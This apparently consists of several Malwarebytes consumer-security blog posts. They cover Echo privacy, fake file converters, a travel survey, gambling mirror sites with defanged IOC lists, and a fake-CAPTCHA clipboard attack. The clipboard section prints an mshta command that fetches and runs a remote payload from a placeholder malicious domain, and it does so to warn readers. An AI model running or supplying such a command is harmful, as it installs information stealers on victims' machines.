Malware Bytes

Amazon has announced its Echo devices will no longer have the option to store and process requests on the device itself, meaning your voice recordings will now be sent to the cloud for processing.

In an email sent to customers, Amazon explained that the feature “Do Not Send Voice Recordings” will no longer be available beginning March 28, 2025.

The reason for this change? AI.

“As we continue to expand Alexa’s capabilities with generative AI features that rely on the processing power of Amazon’s secure cloud, we have decided to no longer support this feature.”

Basically, the processing requests that rely on AI features can’t be done within the limited processing power of the Echo device itself. This means that voice recordings will be sent to and processed in the cloud.

Amazon promises the recordings will be deleted after Alexa processes your requests if you enable the “Don’t Save Recordings” setting (we recommend you do this). But is that promise enough? And what happens to the data before it’s deleted? After all, it wasn’t that long ago that Amazon’s Ring camera feeds were available for all staff and contractors to view.

This change confirms existing fears about user privacy with the implementation of the generative AI version of Alexa. Due to financial losses that came with Alexa’s operation, Amazon introduced the AI-powered Alexa+ which has far more capabilities and should generate more cash-flow. Alexa+ is based on several major language models such as the in-house development Nova, and Claude from Anthropic.

In a statement Amazon told TechCrunch:

“The Alexa experience is designed to protect our customers’ privacy and keep their data secure, and that’s not changing. We’re focusing on the privacy tools and controls that our customers use most and work well with generative AI experiences that rely on the processing power of Amazon’s secure cloud.”

This sounds reassuring, but something that doesn’t leave the device can’t get lost along the way. So, the “Do Not Send Voice Recordings” sounds a lot safer to me.

Reportedly, the change specifically affects the fourth generation Echo Dot (4th Gen), Echo Show 10, and Echo Show 15 devices, for customers in the US with devices set to English.

When devices are too smart

I love gadgets as much as the next person, but with some devices I wonder whether it’s really necessary to make them “smart.”

The only way to protect your privacy and security at home is to avoid using devices that connect to the internet, including your phone. Obviously, in today’s world, that’s an impossible task for most. Therefore, the second-best option is to consider which devices are absolutely necessary for work, pleasure, and convenience, and slim down the list of smart-enabled devices.

For example, for an energy-conscious person, the use of a smart thermostat makes sense. However, we’ve seen plenty of devices that were only smart because it benefited the vendor. Data brokers will pay a pretty penny to those vendors if you install their app which gathers data about you and your device.

The FBI Denver Field Office has warned of an increasing number of scammy websites offering free online file converter services.

Instead of converting files, the tools actually load malware onto victims’ computers. The FBI warned specifically about that malware leading to ransomware attacks, but we’ve also seen similar sites that install browser hijackers, adware, and potentially unwanted programs (PUPs).

The cybercriminals offer any kind of popular file conversion to attract victims, with the most common ones converting .doc to .pdf files and vice versa. There are also sites that offer to combine multiple images into one .pdf file.

And it’s not as if these file converters don’t work. Usually, they will, and the victim will think nothing more of it. They might even recommend it to a friend or co-worker.

But in the background, their system has hidden malware in the file the victim has downloaded, which is capable of gathering information from the affected device such as:

• Personal identifying information (PII) including Social Security Numbers (SSN).
• Financial information, like your banking credentials and crypto wallets.
• Other passwords and session tokens that could allow the scammers to bypass multi-factor authentication (MFA).
• Email addresses.

There are a few possible scenarios the cybercriminals might pursue:

• They encourage you to download a tool on your device to do the conversion. This is the actual malware.
• You might be recommended to install a browser extension that you can use going forward. These extensions are often browser hijackers and adware.
• In the most sophisticated scenario, the so-called converted file contains malware code that downloads and install an information stealer and everyone who opens it will get their device infected.

By using one of these online converters you could be at risk of getting infected with ransomware or enable criminals to steal your data or identity in full.

Education is key

FBI Denver Special Agent in Charge Mark Michalek stated:

“The best way to thwart these fraudsters is to educate people so they don’t fall victim to these fraudsters in the first place.”

Obviously it also helps to have active anti-malware protection on your device and a browser extension that blocks malicious sites.

If you have fallen victim, or suspect you may have, you should:

• Contact your financial institutions immediately. Work with them to take the necessary steps to protect your identity and your accounts.
• Change all your passwords and do this using a clean, trusted device.
• Report it to the Internet Crime Complaint Center.

IOCs

Below are some recent examples of domains involved in this type of scam and the reason why Malwarebytes products block them.

Imageconvertors[.]com (phishing)

convertitoremp3[.]it (Riskware)

convertisseurs-pdf[.]com (Riskware)

convertscloud[.]com (Phishing)

convertix-api[.]xyz (Trojan)

convertallfiles[.]com (Adware)

freejpgtopdfconverter[.]com (Riskware)

primeconvertapp[.]com (Riskware)

9convert[.]com (Riskware)

Convertpro[.]org (Riskware)

We don’t just report on threats – we help safeguard your entire digital identity

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

This year, Spring Break vacationers are packing more than their flip-flops, bucket hats, and sunglasses—they’re also packing a few cybersecurity anxieties for the trip.

According to new research from Malwarebytes, 52% of people said they “worry about being scammed while traveling,” while another 40% admitted that they “worry about my kids or family sharing trip details online.” While most people said they will act on these concerns—63% will make sure their security software is up to date, 53% will back up their data—roughly 10% of people said they will take no precautions whatsoever into protecting their security or privacy while on vacation.

The findings reveal that the public approaches cybersecurity as a patchwork quilt, implementing some best practices while forgoing others, and engaging in a few behaviors that carry significant risk online.

For this research, Malwarebytes conducted a pulse survey of its customers in March via the Alchemer Survey Platform.

Broadly, Malwarebytes found that:

• 52% of people “agreed” or “strongly agreed” that they “worry about being scammed while traveling.”
• 20% of people “agreed” or “strongly agreed” that they “don’t really think about protecting my data while traveling.”
• 38% of people said they will book their next travel opportunity through a “general search,” which could leave them vulnerable to malvertising.
• Apps are a way of life, as 66% of people said they use between one and six apps specifically for travel (such as hotel apps, airline apps, and translation apps). A particularly plugged-in 8% of people said they manage more than seven apps for the same purposes.
• To stay cybersecure and private on vacation, the majority of people will backup their data (53%), ensure their security software is up to date (63%), and set up credit card transaction alerts (56%), but 10% will take none of these—or other—steps.
• 53% of people refuse to take a single laptop with them on vacation, whereas just 1% leave even their smartphone behind—talk about a holiday.

Risky business break

The cybersecurity risks around personal vacations are unlike those around the holidays for major organizations and businesses, in which cybercriminals know that low staffing will leave companies more vulnerable to an attack or breach.

Instead, far-flung Spring Breakers can engage in a series of behaviors both before and during their holidays that leave them open to online scams and theft.

Take, for example, the 38% of people who told Malwarebytes that they would conduct a “general search online” in booking their next vacation. While Google searches are probably one of the most common tasks for any vacation planning, the results that people see can be manipulated through a type of cybercrime called malvertising, short for “malicious advertising.” 

In malvertising, cybercriminals will create a fake website that looks like a popular service, like Facebook, Slack, or eBay. Cybercriminals will also pay a small sum so that these fake websites show up near the top of Google’s sponsored results for relevant searches. Once users click on the websites, which appear legitimate, they’re tricked into downloading malware or handing over sensitive information to scammers.

A safer option for vacationers is to book travel directly with an airline or hotel chain. Many participants wrote this approach into the Malwarebytes survey when selecting the “Other” option (14%). Interestingly, the 29% of respondents who said they use a travel agent for booking likely also receive some extra safeguards, simply because another, experienced, person is involved in the process.

But in the same way that cybercriminals have begun abusing Google search results to send victims to dangerous websites, they’ve also done the same to trick users into downloading fake versions of popular apps.

Android “phishing” apps are a serious threat to users today—Malwarebytes detected 22,800 of them last year alone—and, as we wrote before, they represent the next step in camouflaged cyber-scamming:

“By disguising themselves as legitimate apps—including for services like TikTok, Spotify, and WhatsApp—Android phishing apps can trick victims into typing in their real usernames and passwords on bogus login screens that are controlled entirely by cybercriminals.”

The threat here endures long after the app is installed. If enough victims unwittingly send their passwords, cyber thieves could bundle the login credentials for sale on the dark web. Once the passwords are sold, the new, malicious owners will attempt to use individual passwords for a variety of common online accounts—testing whether, say, an email account password is the same one used for a victim’s online banking system, their mortgage payment platform, or their Social Security portal.

This wouldn’t be too much a problem if modern traveling didn’t involve so many apps.

According to our survey, 44% of people manage between two to four apps specifically for travel purposes, and 9% manage between five and six apps. And while 20% of people use zero apps for travel and 14% use just one app, there are 8% of people who rely on more than seven apps strictly for travel purposes.

That could include airlines apps, hotel apps, translation apps, and more. But as more apps help with traveling needs, more opportunities arise for those apps to be falsely emulated and maliciously advertised online.

As for what people do while physically on vacation, many engaged in online behaviors that could prove risky, but they can hardly be criticized for it.

For example, 25% of people said they scan QR codes while on vacation. These codes could lead people to malicious websites, but QR codes have become normalized at restaurants that no longer have physical menus. And 33% of people “log into financial institution sites or apps to manage [their] budget, check purchases, etc.” This type of activity was susceptible to online eavesdropping many years ago, but everyday internet connections have become far more secure in the past decade. That said, it’s inspiring to see that 41% of people “download or install a VPN” to provide an extra level of security when browsing on public Wi-Fi.

Safe travels

Cybersecurity is probably the last thing people want to “pack” before going away on a break, but, thankfully, it’s something that a majority of people said they do.

For instance, 63% said they “check that [their] security software is up to date,” while 53% said they “backup [their] data.” Similarly, 56% said they “set up credit card transaction alerts.” And while it isn’t quite a majority, 47% said they turn on “Find my Device” features which can help in case of a lost or stolen device. Interestingly, people do not commit to the same precautions for their bags—just 21% of survey participants said they “put a tracker in [their] luggage.”

Still, there’s progress to be made.

Not only did 10% of survey participants share that they take zero cybersecurity or data privacy precautions before traveling, but 20% also agreed or strongly agreed with the statement “I don’t really think about protecting my data while traveling.”

For safety abroad, here are a few tips travelers can take before and during their next vacation:

• Backup your data before you head out. Losing a device or having it stolen while on vacation won’t just ruin the trip itself—it will return the return journey, too. Backing up your data will help ensure that any lost device doesn’t lead to lost files.
• Turn on “Find My” features. To respond to a lost or stolen device, turn on the “Find My” features on iPhones and Androids before your vacation so you can track a device’s location in real time.
• Protect your devices with antivirus and cybersecurity tools. Modern cybersecurity tools don’t just stop viruses from landing on your devices, they also warn you about dangerous websites and links that could steal your info.
• Update your software. Ensure that your devices are running on the latest versions of their operating systems. This helps prevent any known weaknesses from being exploited by cybercriminals.
• Use a password manager and 2FA. Your most sensitive accounts shouldn’t just have a unique password. They should also be protected by two-factor authentication, which requires more than a password for anyone to login.
• Consider a VPN. If you are doing something sensitive online, it never hurts to use a VPN. Bonus: If you’re travelling to another country where your favourite streaming shows aren’t available, a VPN can help here too.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Last week on Malwarebytes Labs:

• Research on iOS apps shows widespread exposure of secrets
• Don’t let your kids on Roblox if you’re not comfortable, says Roblox CEO
• Update your iPhone now: Apple patches vulnerability used in “extremely sophisticated attacks”
• The dark side of sports betting: How mirror sites help gambling scams thrive
• Android devices track you before you even sign in
• X users report login troubles as Dark Storm claims cyberattack
• How ads weirdly know your screen brightness, headphone jack use, and location, with Tim Shott (Lock and Code S06E05)
• Fake CAPTCHA websites hijack your clipboard to install information stealers
• Malwarebytes Premium Security awarded “Product of the Year” from AVLab

Last week on ThreatDown:

• ThreatDown is Product of The Year
• March 2025 Patch Tuesday, severity over quantity
• Phishing, now available on your favorite app store!

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Researchers found that most of the apps available on Apple’s App Store leak at least one hard-coded secret.

The researchers looked at 156,000 iOS apps and discovered more than 815,000 hardcoded secrets, including very sensitive secrets like keys to cloud storage, various Application Programming Interfaces (APIs), and even payment processors.

The researchers noted how:

“The average app’s code exposes 5.2 secrets, and 71% of apps leak at least one secret.”

Secrets hard-coded in the source code of the apps are considered exposed because they are relatively easy to find and abuse by cybercriminals.

While you may think that’s the publisher’s problem, these hard-coded secrets can have serious consequences for the an app’s users, particularly when these are credentials which provide access to cloud storage services like AWS S3 buckets or Azure Blob Storage. The researchers found 78,000 apps which exposed cloud storage buckets.

We have posted plenty of examples of exposed AWS S3 buckets over the years, often leading to millions of exposed customer records. Depending on the type of app these records can contain financial data, location data, and other personal information.

Unless you’re able to reverse engineer an app, there is not a lot you can do after the fact. But you can keep this information in mind before you install an app. Do you trust the developers to follow best practices and do you really need it? Also keep a tight rein on the permissions you allow an app.

Protecting yourself after a data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

• Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
• Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
• Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
• Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
• Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
• Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
• Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Check your digital footprint

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

SCAN NOW

In response to growing worries about the safety of children using Roblox, the CEO of the company has said to parents: “My first message would be, if you’re not comfortable, don’t let your kids be on Roblox.”

Roblox is one of the most popular gaming platforms, especially among young children. Reportedly, of the over 80 million players per day, roughly 40% of them are below the age of 13.

As we wrote last month, a lawsuit was recently initiated against Roblox and messaging platform Discord, in which Roblox was referred to as a “real-life nightmare for children.”

Besides spending way too much time on the platform, children run the risk of getting exposed to inappropriate content, online predators, cyberbullying, and scams. Scammers often promise free Robux (the virtual currency used on the platform) or other benefits to trick children into sharing personal information or downloading malware.

The lawsuit claims that both Roblox and Discord are aware of how easily predators can target children through their platforms by grooming and manipulating children into sending explicit material but have failed to provide adequate safety measures to protect minors from such exploitation. 

Asked about the allegations, co-founder and CEO of Roblox, Dave Baszucki said the company is vigilant in protecting its users and pointed out that tens of millions of people enjoy an amazing experience on the platform.

“We watch for bullying, we watch for harassment, we filter all of those kinds of things, and I would say behind the scenes, the analysis goes on all the way to, if necessary, reaching out to law enforcement.”

But to parents who are still worried, he told the BBC these caretakers should trust their instincts and make their own decisions and don’t let their kids be on Roblox.

Which, if you have kids, will recognize as something  “easier said than done.”

How can you keep your children safe?

Since it’s not likely you’ll be able to guide your children 24/7 in their online journey, here are some tips you can use to keep them safe.

• Take control. Use Roblox’s Parental Controls to limit access to age-appropriate games and content and enable features like daily screen-time limits.
• Anonymize. When setting up your child’s Roblox account, avoid using real names, and use an appropriate date of birth to enable the relevant restrictions.
• Friend requests. Access the settings of your child’s account to limit or disable friend requests and online chat capabilities.
• Stay on the platform. Tell your child to refuse requests to take chats offline or to another platform. Predators will do this to avoid Roblox’s restrictions about sharing images.
• Education. Teach children about online safety, including not sharing personal information and avoiding suspicious links, and make sure they are comfortable sharing their online experiences with you.
• Play with them. What’s more fun than beating your parents in your favorite game? Spending some quality time with them makes it fun to keep an eye on them and the games they enjoy.
• Information. Stay on top of information about Roblox’s updates, features, and changes.
• Protect the device. Make sure they are playing on a device that is fully up-to-date and actively protected.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Apple has patched a vulnerability in iPhone and iPad that was under active exploitation by cybercriminals.

The update is available for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later.

If you use any of these then you should install updates as soon as you can. To check if you’re using the latest software version, go to Settings (or System Settings) > General > Software Update. It’s also worth turning on Automatic Updates if you haven’t already, which you can do on the same screen.

Update Now

Overall, security updates were issued for:

Safari 18.3.1macOS Ventura and macOS SonomaiOS 18.3.2 and iPadOS 18.3.2iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and latermacOS Sequoia 15.3.2macOS SequoiavisionOS 2.3.2Apple Vision Pro

If you use Malwarebytes for iOS, you can use the app to check if you need to update, and be guided through the update process.

Malwarebytes for iOS Trusted Advisor Technical details

WebKit is the browser engine developed by Apple that helps display web content in applications. It allows apps to show web pages without the need for a full web browser. WebKit is used in many Apple products, such as Safari, Mail, and the App Store, as well as in other devices like PlayStation consoles and Amazon Kindle e-readers.

The actively exploited vulnerability is tracked as CVE-2025-24201.

“An out-of-bounds write issue was addressed with improved checks to prevent unauthorized actions. This issue is fixed in visionOS 2.3.2, iOS 18.3.2 and iPadOS 18.3.2, macOS Sequoia 15.3.2, Safari 18.3.1. Maliciously crafted web content may be able to break out of Web Content sandbox. This is a supplementary fix for an attack that was blocked in iOS 17.2. (Apple is aware of a report that this issue may have been exploited in an extremely sophisticated attack against specific targeted individuals on versions of iOS before iOS 17.2.).”

Simply put, that means an attacker could send or lure a target to open a web page which would cause an overflow in the allocated memory for WebKit. The overflow would then enable the attacker to escape from the Web Content Sandbox, which is a security feature used in web browsers to isolate web content, such as web pages and scripts, from the rest of the system. It’s designed to stop malicious code from accessing sensitive system resources or user data outside of the browser.

About a month ago, we reported how Apple fixed another extremely sophisticated attack, that was used against targeted individuals. This one is much more likely to be used against more users so should you prioritise updating your phone as soon as you can.

We don’t just report on phone security—we provide it

Cybersecurity risks should never spread beyond a headline. Keep threats off your mobile devices by downloading Malwarebytes for iOS, and Malwarebytes for Android today.

Sports betting is a multi-billion-dollar industry, but behind the flashing lights and promises of easy money lies a hidden underworld of deception.

In recent years, shady betting companies have found a clever way to bypass regulations and continue their operations through mirror sites—duplicate versions of their main website that allow them to evade bans, deceive users, and rake in massive profits. 

How gambling companies exploit mirror domains 

A mirror site is essentially a clone of an existing betting website, hosted on a different domain. Companies create dozens – sometimes even hundreds – of these mirrors to ensure they remain accessible even when regulators try to shut them down. 

Why do they do this? 

• Evade regulation: Governments and gambling commissions regularly block illegal or unlicensed betting sites. When one gets banned, the company simply redirects users to a new domain. 

• SEO and ad manipulation: More domains mean more search engine presence, allowing these companies to dominate the online gambling market and attract unsuspecting bettors. 

• Affiliate and referral loopholes: Many of these sites exist solely to capture affiliate commissions, misleading users into thinking they are signing up through legitimate sources. 

• Phishing and fraud risks: Users might unknowingly enter personal and financial details on a fake version of the site, opening themselves up to scams and identity theft. 

1xBet: From mirror site king to FC Barcelona sponsor 

One of the most infamous cases of gambling companies using mirror domains is 1xBet, a company that built an empire by aggressively bypassing laws through hundreds of duplicate sites. 

1xBet’s tactics were so successful that they made millions in revenue, eventually becoming a global sponsor of FC Barcelona. But despite their rise to legitimacy, their past was riddled with controversy: 

• They were banned in Russia but continued to operate through mirror sites. 

• The UK Gambling Commission launched an investigation into their illegal activities, forcing them to suspend operations in the UK. 

• Reports surfaced that they hosted illegal casino games and even betting on cockfighting. 

Even after being blacklisted in multiple countries, they continued to thrive simply by shifting users to a new domain each time one was blocked. 

20Bet and MostBet’s expanding mirror network 

But 1xBet isn’t alone. Recent investigations have revealed that newer betting companies are using the same shady tactics. 

• 20Bet has over 100 active domains, many of which are identical mirrors/referrals of each other. 

• MostBet has over 40 mirror sites, ensuring that they can never be completely shut down. 

This extensive network allows them to: 

• Dodge regulatory action and continue operating in countries where they are banned. 

• Flood search engines and ad networks, making it difficult for users to distinguish legitimate operators from scams. 

• Run deceptive marketing campaigns, promising risk-free bets and bonuses that are often impossible to claim. 

The real danger: How users get trapped 

Imagine this scenario: A football fan eager to bet on an upcoming match searches for a reliable betting site. They click on a paid ad for 20Bet, promising a “100% Risk-Free Bet Up to $500.” 

• They sign up and deposit money on what appears to be the official site. 

• They win their first bet and try to withdraw—but the site suddenly disappears. 

• They find another 20Bet domain and try logging in—only to realize their credentials don’t work. They’ve been scammed. 

Because so many duplicate domains exist, it’s nearly impossible for users to track where their money is actually going – or whether the site they’re on is real at all. 

How to protect yourself from betting scams 

With the rise of mirror sites, it’s more important than ever to be cautious when engaging in online sports betting. Here are some tips to stay safe: 

1. Check for proper licensing: Legitimate betting companies should be licensed by recognized authorities like the UK Gambling Commission or Malta Gaming Authority. 

2. Avoid too-good-to-be-true promotions: If a site is offering unrealistic bonuses or “guaranteed” wins, it’s likely a scam. 

3. Use trusted sources for links: Don’t click on ads or promotional links. Instead, visit the official websites of reputable gambling regulators. 

4. Be wary of multiple domains: If a betting company has dozens of different URLs, it’s a major red flag. 

5. Research before depositing: Look up reviews and complaints from other users before signing up for any site. 

Final thoughts: A dangerous game of cat and mouse 

The sports betting industry continues to grow, but its darker side remains hidden beneath layers of deception. Companies like 1xBet, 20Bet, and MostBet have found ways to outmanoeuvre regulators and keep the money flowing—often at the expense of unsuspecting bettors. 

The fact that one of the world’s most controversial gambling companies (1xBet) went from running mirror sites to sponsoring FC Barcelona should serve as a wake-up call. These companies are not just skirting the law – they are thriving because of it. 

Until regulators find a way to effectively combat these tactics, sports bettors must remain vigilant. If something seems off, it probably is. And in the world of online gambling, a single wrong move could mean the difference between a big win and losing everything. 

IOCs 

MostBet – 
2d593xv[.]com 

3p4hdpmb[.]com 

3z9sbhba58mst[.]com 

4jls7l19[.]com 

4rayasmb[.]com 

560rp67[.]com 

6q4mhfo[.]com 

7tr85sq[.]com 

9389z7h[.]com 

9mnekb9[.]com 

ad2s0rs[.]com 

casinomstwins[.]com 

cdwxjlz[.]com 

jtw2fgmb[.]com 

llhrd3wu6vmb[.]com 

mfviz8eunkmb[.]com 

mkvw5jomb[.]com 

mostbet-in33[.]com 

mostbet-in34[.]com 

mostbet-in36[.]com 

mostbet-in37[.]com 

mostbet-in46[.]com 

mostbet-in56[.]com 

mostbet-in62[.]com 

mostbethu1[.]com 

mostbetru-44[.]com 

nfc5wbnalsmb[.]com 

ozvfgemb[.]com 

rw7e3v5gsumb[.]com 

sdma8tw[.]com 

sez67b24o7mb[.]com 

siosckmb[.]com 

sj13ywp[.]com 

szakt9s[.]com 

tqmdpkthxengz3g1[.]com 

v2izr0q9drmb[.]com 

vb7awyus6kmb[.]com 

w53hy6afrpmb[.]com 

winnerzonecasino[.]com 

ww16[.]mostbetru-44[.]com 

ww38[.]mostbetru-44[.]com 

x2cy2g8[.]com 

y16uyxu[.]com 

y2iqdt2[.]com 

ze59byq[.]com 

22bet – 

20-bet[.]ar 

20-bet[.]at 

20-bet[.]ca 

20-bet[.]cz 

20-bet[.]es 

20-bet[.]in 

20-bet[.]org 

20-bet[.]pt 

20-betbet[.]com 

20-winbet[.]com 

20bet-bet[.]com 

20bet-bg[.]com 

20bet-br[.]com 

20bet-casino[.]org 

20bet-co[.]org 

20bet-dk[.]org 

20bet-dk[.]site 

20bet-es[.]com 

20bet-fi[.]org 

20bet-hr[.]org 

20bet-hu[.]org 

20bet-italia[.]com 

20bet-jp[.]com 

20bet-portuguese[.]com 

20bet-s[.]com 

20bet-win[.]com 

20bet[.]asia 

20bet[.]be 

20bet[.]ch 

20bet[.]cl 

20bet[.]co[.]nz 

20bet[.]com 

20bet[.]com[.]de 

20bet[.]com[.]in 

20bet[.]com[.]pl 

20bet[.]com[.]se 

20bet[.]hu 

20bet[.]icu 

20bet[.]life 

20bet[.]me 

20bet[.]nz 

20bet[.]org[.]in 

20bet[.]vip 

20bet[.]win 

20bet1[.]com 

20bet1[.]net 

20bet1[.]org 

20bet2[.]com 

20bet3[.]com 

20bet4[.]com 

20bet5[.]com 

20beta[.]com 

20betapk[.]com 

20betapp[.]com 

20betb[.]com 

20betbet[.]com 

20betbr[.]com[.]br 

20betbrasil[.]com 

20betcasino[.]lat 

20betcasino[.]mx 

20betcasino[.]net 

20betcasino[.]si 

20betcasinoromania[.]org 

20betcasinos[.]net 

20betcassino[.]com 

20betentrar[.]com 

20betforum[.]com 

20betgame[.]net 

20betkasyno[.]pl 

20betlogin[.]it 

20betluck[.]com 

20betlucks[.]com 

20betmirror[.]com 

20beto[.]com 

20betpartners[.]com 

20betportugues[.]com 

20bets[.]cc 

20bets[.]com[.]br 

20bets[.]in 

20bets[.]org 

20bets[.]pe 

20bets[.]pl 

20betsite[.]com 

20bett[.]com 

20bett[.]org 

20bettin[.]com 

20betting[.]com 

20betzone[.]com 

20bplay[.]com 

20bwin[.]com 

20bwin[.]pt 

20bwins[.]com 

20glob[.]com 

20luckbet[.]com 

20media[.]world 

20win88[.]com 

20winluck[.]com 

aposta20bet[.]com 

apostas20[.]com 

bet-20[.]it 

bet-20[.]pl 

bet20[.]com[.]br 

bet20[.]com[.]pl 

bet20[.]com[.]pt 

bet20[.]gr 

bet20[.]online 

bet20[.]pt 

bet20brasil[.]com 

bet20brazil[.]com 

bet20italia[.]com 

bet20portugal[.]com 

bet20pt[.]com 

bonus-20bet[.]com 

bookie20[.]com 

es20bet[.]com 

esbet20[.]com 

forum20bet[.]com 

free-bookie[.]com 

free20bet[.]com 

links20[.]world 

mail20media[.]com 

pt-20bet[.]com 

svkzjv[.]com 

twentybet[.]net 

xxbet[.]it 

xxbetportugal[.]com 

This week on the Lock and Code podcast…

Something’s not right in the world of location data.

In January, a location data broker named Gravy Analytics was hacked, with the alleged cybercriminal behind the attack posting an enormous amount of data online as proof. Though relatively unknown to most of the public, Gravy Analytics is big in the world of location data collection, and, according to an enforcement action from the US Federal Trade Commission last year, the company claimed to “collect, process, and curate more than 17 billion signals from around a billion mobile devices daily.”

Those many billions of signals, because of the hack, were now on display for security researchers, journalists, and curious onlookers to peruse, and when they did, they found something interesting. Listed amongst the breached location data were occasional references to thousands of popular mobile apps, including Tinder, Grindr, Candy Crush, My Fitness Pal, Tumblr, and more.

The implication, though unproven, was obvious: The mobile apps were named with specific lines of breached data because those apps were the source of that breached data. And, considering how readily location data is traded directly from mobile apps to data brokers to advertisers, this wasn’t too unusual a suggestion.

Today, nearly every free mobile app makes money through ads. But ad purchasing and selling online is far more sophisticated than it used to be for newspapers and television programs. While companies still want to place their ads in front of demographics they believe will have the highest chance of making a purchase—think wealth planning ads inside the Wall Street Journal or toy commercials during cartoons—most of the process now happens through pieces of software that can place bids at data “auctions.” In short, mobile apps sometimes collect data about their users, including their location, device type, and even battery level. The apps then bring that data to an advertising auction, and separate companies “bid” on the ability to send their ads to, say, iPhone users in a certain time zone or Android users who speak a certain language.

This process happens every single day, countless times every hour, but in the case of the Gravy Analytics breach, some of the apps referenced in the data expressed that, one, they’d never heard of Gravy Analytics, and two, no advertiser had the right to collect their users’ location data.

In speaking to 404 Media, a representative from Tinder said:

“We have no relationship with Gravy Analytics and have no evidence that this data was obtained from the Tinder app.”

A representative for Grindr echoed the sentiment:

“Grindr has never worked with or provided data to Gravy Analytics. We do not share data with data aggregators or brokers and have not shared geolocation with ad partners for many years.”

And a representative for a Muslim prayer app, Muslim Pro, said much of the same:

“Yes, we display ads through several ad networks to support the free version of the app. However, as mentioned above, we do not authorize these networks to collect location data of our users.”

What all of this suggested was that some other mechanism was allowing for users of these apps to have their locations leaked and collected online.

And to try to prove that, one independent researcher conducted an experiment: Could he find himself in his own potentially leaked data?

Today, on the Lock and Code podcast with host David Ruiz, we speak with independent research Tim Shott about his investigation into leaked location data. In his experiment, Shott installed two mobile games that were referenced in the breach, an old game called Stack, and a more current game called Subway Surfers. These games had no reason to know his location, and yet, within seconds, he was able to see more than a thousand requests for data that included his latitude, his longitude, and, as we’ll learn, a whole lot more.

“ I was surprised looking at all of those requests. Maybe 10 percent of [them had] familiar names of companies, of websites, which my data is being sent to… I think this market works the way that the less you know about it, the better from their perspective.”

Tune in today to listen to the full conversation.

how notes and credits:

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
http://creativecommons.org/licenses/by/4.0/
Outro Music: “Good God” by Wowa (unminus.com)

Listen up—Malwarebytes doesn’t just talk cybersecurity, we provide it.

Protect yourself from online attacks that threaten your identity, your files, your system, and your financial well-being with our exclusive offer for Malwarebytes Premium for Lock and Code listeners.

There are more and more sites that use a clipboard hijacker and instruct victims on how to infect their own machine.

I realize that may sound like something trivial to steer clear from, but apparently it’s not because the social engineering behind it is pretty sophisticated.

At first, these attacks were more targeted at people that could provide cybercriminals a foothold at a targeted company, but their popularity has grown so much that now anyone can run into one of them.

It usually starts on a website that promises visitors some kind of popular content: Movies, music, pictures, news articles, you name it.

Nobody will think twice when they are asked to prove they are not a robot.

But the next step in this method isn’t what you would normally see. If you use the checkbox, you’ll be forwarded to something that looks like this:

“To better prove you are not a robot, please:

1. Press & hold the Windows Key + R.
2. In the verification windows, press Ctrl + V.
3. Press Enter on your keyboard to finish.
   

You will observe and agree:
“I’m not a robot – reCAPTCHA Verification ID: 8253”

Perform the steps above to finish verification.”

While these instructions may seem harmless enough, if you follow the steps you will actually be infecting yourself with malware—most likely an information stealer. In the background, the website you visited copied a command to your clipboard. In Chromium based browsers (which are almost all the popular ones) a website can only write to your clipboard with your permission. But Windows was under the assumption that you agreed to that when you checked the checkbox in the first screen.

What the obstructions in the prompt are telling you to do is:

1. Open the Run dialog box on Windows.
2. Paste the content of your clipboard into that dialog box.
3. Execute the command you just pasted.

They are not lying about what you will “observe”, but what they don’t tell you is that that’s only the last part of what you pasted, and what you are seeing is not really part of the command but just a comment added behind it.

But under normal circumstances, this is what will be visible.

You’ll only see the last part of the pasted content

The first part of what the target was instructed to paste are variations–sometimes obfuscated—of:

mshta https://{malicious.domain}/media.file

Mshta is a command that will trigger the legitimate Windows executable mshta.exe. But mshta will fetch the malicious media file from the specified domain and run it. The name of the media file may look perfectly fine. We have seen mp3, mp4, jpg, jpeg, swf, html, and there will be other possibilities.

What the files are in reality is an encoded Powershell command which will run invisibly and download the actual payload. For a while, the malware we were seeing downloaded was almost exclusively the Lumma Stealer infostealer, but recently we’ve also found campaigns that use the same method to spread the SecTopRAT. Both of these are designed to steal sensitive data from your machine.

How to stay safe

There are a few things you can do to protect yourself from falling victim to these and similar methods:

• Do not follow instructions provided by some website you visited without thinking it through.
• Use an active anti-malware solution that blocks malicious websites and scripts.
• Use a browser extension that blocks malicious domains and scams.
• Disable JavaScript in your browser before visiting unknown websites.

The clipboard access is triggered by a JavaScript function document.execCommand(‘copy’).  Disabling JavaScript will stop that from happening, but it has the disadvantage that it will break many websites that you visit regularly. What I do is use different browsers for different purposes.

Here are step-by-step instructions on how to disable JavaScript in several popular browsers:

How to disable JavaScript in Chrome

• Open Chrome and click on the three-dot menu icon in the top right corner.
• Select Settings from the dropdown menu.
• On the left side, click on Privacy and security.
• Click on Site settings.
• Scroll down to the Content section and click on JavaScript.

